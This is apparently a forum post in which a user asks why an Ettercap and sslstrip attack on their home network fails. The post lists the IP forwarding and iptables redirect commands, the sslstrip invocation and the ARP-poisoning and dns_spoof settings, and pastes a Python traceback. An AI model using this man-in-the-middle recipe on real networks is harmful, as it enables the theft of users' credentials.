Hi,
I am trying to use Ettercap -G with sslstrip to see if I can get passwords from a computer on my home network.
I am using Kali 1.0.9. I am using the NIC that is on the laptop. I have an Alfa NHA, but I have not tried it with this yet. The NIC is wlan0.
I have a router (192.168.1.1) with 2.4 and 5 Ghz bands on it (2.4 is 1 and 5 is 2). Signal is bad in another part of the house so I have an extender (192.168.1.110) which has 2.4 and 5 Ghz bands also (1a and 2a).
The computer I am trying to run it on is a desktop in the other room (192.168.1.118).
These are my commands:
In terminal A:
[echo '1' > /proc/sys/net/ipv4/ip_forward]
[iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000]
[sslstrip -l 10000]
Open another terminal:
ettercap -G
In Ettercap -G these are my settings:
I put it in promiscuous mode
I select unified sniff
I choose wlan0 (my interface)
Under host, I scan for hosts then I chose Host List
I out my router as Target 1
I put my desktop (the one I am trying to run it on(192.168.1.118)) as Target 2
Under Manage Plugins, I choose dns_spoof
Under MITM I choose Arp poisoning
I then select sniff remote poisoning
Then I start the sniff
Nothing seems to happen in Ettercap -G, but in the sslstrip terminal I get a runtime error. I tried to open the sslstrip.log and there is nothing in it. This is the error:
root@kali:~# sslstrip -l 10000
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "/usr/bin/sslstrip", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 599, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 263, in _disconnectSelectable
selectable.connectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 433, in connectionLost
Connection.connectionLost(self, reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 277, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 455, in connectionLost
self.handleResponseEnd()
File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 466, in handleResponseEnd
self.handleResponse(b)
File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 133, in handleResponse
self.client.write(data)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 898, in write
raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called]
I have been reading tutorials and watching videos and I do exactly what they do in the videos and the tutorials, but I am having no luck.
At first I did not have the' around the 1 on the echo command with sslstrip. I also saw that instead of port 10000, sometimes port 8080 is used. I am not sure if I should use a different one or not, or if I should remove the ' around the 1 in the echo command.
I was going to try it with my Alfa and see if it may be the NIC that is in the laptop. My Alfa shows up as wlan1 so I was going to put wlan0 down.
I also noticed when I do it, I seem to cut off the internet connection for the whole house. I think it may be the ports I am using.